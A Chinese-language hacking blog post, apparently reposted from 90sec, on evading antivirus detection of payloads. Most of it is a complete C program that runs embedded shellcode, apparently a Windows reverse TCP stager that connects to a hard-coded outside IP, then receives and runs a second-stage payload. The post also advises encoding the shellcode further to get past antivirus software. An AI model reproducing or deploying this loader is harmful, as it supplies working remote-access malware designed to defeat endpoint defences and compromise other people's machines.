 
很多时候,杀毒软件杀我们的payload.很多时候,我们用了ENCODE能够直接躲过杀软。
但是随着人越来越多的使用,这种方式已经慢慢的不能满足了,之前有人说shellcode里有0×00是不能使用。
 
 
 但是在一些情况下还是能够使用的。我试过10个WEBSHELL,一半是能用的。但是另外一半为什么不能用我一直没弄明白。
 
 
 代码 如下
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | #include <windows.h> #include <stdio.h> unsigned char shellcode[] =  “/xfc/xe8/x89/x00/x00/x00/x60/x89/xe5/x31/xd2/x64/x8b/x52/x30″ “/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff” “/x31/xc0/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2″ “/xf0/x52/x57/x8b/x52/x10/x8b/x42/x3c/x01/xd0/x8b/x40/x78/x85″ “/xc0/x74/x4a/x01/xd0/x50/x8b/x48/x18/x8b/x58/x20/x01/xd3/xe3″ “/x3c/x49/x8b/x34/x8b/x01/xd6/x31/xff/x31/xc0/xac/xc1/xcf/x0d” “/x01/xc7/x38/xe0/x75/xf4/x03/x7d/xf8/x3b/x7d/x24/x75/xe2/x58″ “/x8b/x58/x24/x01/xd3/x66/x8b/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b” “/x04/x8b/x01/xd0/x89/x44/x24/x24/x5b/x5b/x61/x59/x5a/x51/xff” “/xe0/x58/x5f/x5a/x8b/x12/xeb/x86/x5d/x68/x33/x32/x00/x00/x68″ “/x77/x73/x32/x5f/x54/x68/x4c/x77/x26/x07/xff/xd5/xb8/x90/x01″ “/x00/x00/x29/xc4/x54/x50/x68/x29/x80/x6b/x00/xff/xd5/x50/x50″ “/x50/x50/x40/x50/x40/x50/x68/xea/x0f/xdf/xe0/xff/xd5/x97/x6a” “/x05/x68/x76/x26/x4a/x0a/x68/x02/x00/x00/x50/x89/xe6/x6a/x10″ “/x56/x57/x68/x99/xa5/x74/x61/xff/xd5/x85/xc0/x74/x0c/xff/x4e” “/x08/x75/xec/x68/xf0/xb5/xa2/x56/xff/xd5/x6a/x00/x6a/x04/x56″ “/x57/x68/x02/xd9/xc8/x5f/xff/xd5/x8b/x36/x6a/x40/x68/x00/x10″ “/x00/x00/x56/x6a/x00/x68/x58/xa4/x53/xe5/xff/xd5/x93/x53/x6a” “/x00/x56/x53/x57/x68/x02/xd9/xc8/x5f/xff/xd5/x01/xc3/x29/xc6″ “/x85/xf6/x75/xec/xc3″; int main() { &nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;((void(*)(void))&shellcode)(); &nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;return 0; } | 
使用方法都知道,可以用encode将shellcode变形。
 
 
 这无疑也是一种方式。
 
 
 大家也还可以用C继续写,将shellcode在继续编码。


相关文章推荐:《那些年一起绕过的杀软》《好免杀,hyperion造》
via[wangzi@90sec]
	
	  
  
    
    
 Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
	
     
	  
   
      地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
	  
    邮箱:service@hongdaqianqiu.com
	
	
	
		备案号:粤ICP备15078875号